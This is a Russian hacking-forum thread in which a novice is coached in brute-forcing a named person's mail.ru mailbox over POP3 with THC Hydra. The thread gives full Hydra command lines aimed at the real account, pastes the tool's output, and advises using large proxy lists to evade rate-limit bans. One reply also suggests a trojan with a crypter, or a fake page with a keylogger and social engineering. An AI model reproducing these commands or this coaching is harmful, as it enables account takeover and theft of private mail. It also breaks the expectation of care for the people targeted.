- Автор темы
- Добавить закладку
- #21
Ar3s
нет не подобрал и почему то отчёт пормируется по адресу С
ocuments and Settings\Admin\otchet.txt
нет не подобрал и почему то отчёт пормируется по адресу С
ocuments and Settings\Admin\otchet.txt-
XSS.stack #1 – первый литературный журнал от юзеров форума
Hydra под Windows XP
- Автор темы lipchanin
- Дата начала
- Статус
Да потому, что у тебя текущая папка такая, потому он там и делает отчёт. Сделай:
CD C:\1\hydra\
чтобы отчёт формировался в папке с гидрой. 11 секнуд длить может из-за того, что у тебя в файле паролей мало паролей? Скажем 11 штук? Сделай при вызове параметр -vV и смотри что тебе гидра будет молвить...
CD C:\1\hydra\
чтобы отчёт формировался в папке с гидрой. 11 секнуд длить может из-за того, что у тебя в файле паролей мало паролей? Скажем 11 штук? Сделай при вызове параметр -vV и смотри что тебе гидра будет молвить...
- Автор темы
- Добавить закладку
- #23
groundhog
Паролей там много, может другая причина может быть?
А строка при старте и завершении брута такая должна быть???
C:\Documents and Settings\Admin>C:\1\hydra.exe -l natali_grjazeva -p words.txt -o otchet.txt -f pop.mail.ru pop3
Hydra v5.4 © 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-02-11 21:38:31
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop.mail.ru (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-02-11 21:38:42
Кстати может дадите ссылку на нормальный большой словарик
И ещё, сколько слов в секунду (или минуту) гидра брутит?
Паролей там много, может другая причина может быть?
А строка при старте и завершении брута такая должна быть???
C:\Documents and Settings\Admin>C:\1\hydra.exe -l natali_grjazeva -p words.txt -o otchet.txt -f pop.mail.ru pop3
Hydra v5.4 © 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-02-11 21:38:31
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop.mail.ru (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-02-11 21:38:42
Кстати может дадите ссылку на нормальный большой словарик
И ещё, сколько слов в секунду (или минуту) гидра брутит?
Блин, ну я понимаю ты новенький, сложно, учишься, ну байт-перебайт, ты читать умеешь что тебе пишут? Я же сказал напиши -vV при запуске:
hydra.exe -l natali_grjazeva -p words.txt -o otchet.txt -vV -f pop.mail.ru pop3
Сколько и чего она брутит она тебе в интерактивном режиме пишет, потому что это зависит от сервиса какой ты брутишь, состояния канала и коэффициента кривизны рук того, кто её запустил...
hydra.exe -l natali_grjazeva -p words.txt -o otchet.txt -vV -f pop.mail.ru pop3
Сколько и чего она брутит она тебе в интерактивном режиме пишет, потому что это зависит от сервиса какой ты брутишь, состояния канала и коэффициента кривизны рук того, кто её запустил...
- Автор темы
- Добавить закладку
- #25
C:\Documents and Settings\Admin>C:\1\hydra.exe -l natali_grjazeva -p words.txt -o otchet.txt -vV -f pop.mail.ru pop3
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
Hydra v5.4 © 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-02-12 14:11:09
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[VERBOSE] Resolving addresses ... done
[STATUS] attack finished for pop.mail.ru (waiting for childs to finish)
[ATTEMPT] target pop.mail.ru - login "natali_grjazeva" - pass "words.txt" - chil
d 0 - 1 of 1
Error: Not an POP3 protocol or service shutdown: (null)
Hydra (http://www.thc.org) finished at 2009-02-12 14:11:11
Опять вот это выдал, вроде всё правильно делаю и словарь на 3 миллиона слов поставил. Что не так ??? Понадписи я так понимаю атака пошла и сразу почти прекратилась. :help:
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 1.
Hydra v5.4 © 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-02-12 14:11:09
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[VERBOSE] Resolving addresses ... done
[STATUS] attack finished for pop.mail.ru (waiting for childs to finish)
[ATTEMPT] target pop.mail.ru - login "natali_grjazeva" - pass "words.txt" - chil
d 0 - 1 of 1
Error: Not an POP3 protocol or service shutdown: (null)
Hydra (http://www.thc.org) finished at 2009-02-12 14:11:11
Опять вот это выдал, вроде всё правильно делаю и словарь на 3 миллиона слов поставил. Что не так ??? Понадписи я так понимаю атака пошла и сразу почти прекратилась. :help:
Запускать так:
Если пишет:
Это значит или сервис в дауне, или у тебя фаервол не даёт гидре вылезти во внешку, или админы тебя всё-таки забанили за такое паливо...
Слушай, и насчёт словаря в 300 млн. слов... Такой словарь обладает явной избыточностью, ты вес его видел? Ты думаешь тебе дадут на один аккаунт зафигачить несколько сот мегабайт? Админы тебя пропалят и забанят по айпишнику... Тут как и в сексе - размер не главное, тут главное провести всё чётко и со знанием дела, попробуй сначала специализированные словари - словари дат, словари имён, словари частовстречающихся комбинаций и т.д.
Код:
hydra -l natali_grjazeva@mail.ru -P passlist.txt -o result.txt -vV -t 10 pop.mail.ru pop3Если пишет:
Код:
Error: Not an POP3 protocol or service shutdown: (null)Это значит или сервис в дауне, или у тебя фаервол не даёт гидре вылезти во внешку, или админы тебя всё-таки забанили за такое паливо...
Слушай, и насчёт словаря в 300 млн. слов... Такой словарь обладает явной избыточностью, ты вес его видел? Ты думаешь тебе дадут на один аккаунт зафигачить несколько сот мегабайт? Админы тебя пропалят и забанят по айпишнику... Тут как и в сексе - размер не главное, тут главное провести всё чётко и со знанием дела, попробуй сначала специализированные словари - словари дат, словари имён, словари частовстречающихся комбинаций и т.д.
- Автор темы
- Добавить закладку
- #27
Всё равно не получается, наверное и впрямь забанили, но неможет быть чтобы и на mail.ru и на rambler.ru и на yandex.ru
groundhog
А ты сам с чего посоветуешь начать (интересует именно взлом)?
groundhog
А ты сам с чего посоветуешь начать (интересует именно взлом)?
lipchanin, сначала нужно выучить мат. часть. Представление о хакинге как "...взял прогу и поломал весь инет..." кануло в лету. Выучи какой-нибудь язык программирования, начни зубрить технические тексты RFC... Сложно самому - учись в универе, там за 5 лет тебя многому научат... Не хочешь учиться? Думаю на этом форуме или на любом другом тематическом форуме ты найдёшь себе "учителя", только запомни одно - никто с тобой бесплатно сюскаться не будет. Можешь задавать самые тупые вопросы, но чем тупее вопрос, тем будет больше цена... Рано или поздно тебе это надоест, и начнёшь на все свои вопросы находить ответ сам.
Кстати, насчёт брута, ты учти, что некоторые POP3 сервера защищены от брута, и если ты за маленький промежуток времени сделаешь несколько неудачных попыток авторизации, то тебя забанят на минут 15-20.
Кстати, насчёт брута, ты учти, что некоторые POP3 сервера защищены от брута, и если ты за маленький промежуток времени сделаешь несколько неудачных попыток авторизации, то тебя забанят на минут 15-20.
Именно это и происходит. Стандартная фича на всех мыльниках количество неудавшихся попыток за определенный интервал времени. Как вариант если прога поддерживает прокси, попробую с большой базой живых прокси сделать подбор. Хотя имхо все равно не оч эфективно
Сбрутить с локального компа мыло на mail.ru практически не реально. Там отличная система защиты. Она сходу блокирует после 3-5 (не помню) неудачных попыток. Нужно или очень много прокси (кстати тоже не гарантия, помнится писали, что и это предусмотренно) или другой подход к делу. Советую не тратить время даром. Попробуй тему с трояном+крипт+впаривание или фейк+кейлогер+социалка. (советовать поиск SQL иньекций не буду, видя уровень спрашивающего).
И последнее. Хватит может размусоливать абсолютно лажовую тему. Все нужные ответы были даны еще на первой странице и в мане гидры. Понимаю, хочется помочь, но доходит до абсурда. p.s. Обидеть никого не хотел.
И последнее. Хватит может размусоливать абсолютно лажовую тему. Все нужные ответы были даны еще на первой странице и в мане гидры. Понимаю, хочется помочь, но доходит до абсурда. p.s. Обидеть никого не хотел.
- Статус